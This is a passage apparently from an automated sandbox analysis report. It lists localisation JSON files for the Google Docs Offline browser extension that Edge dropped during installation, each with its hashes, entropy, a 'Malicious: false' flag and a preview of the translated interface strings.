Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
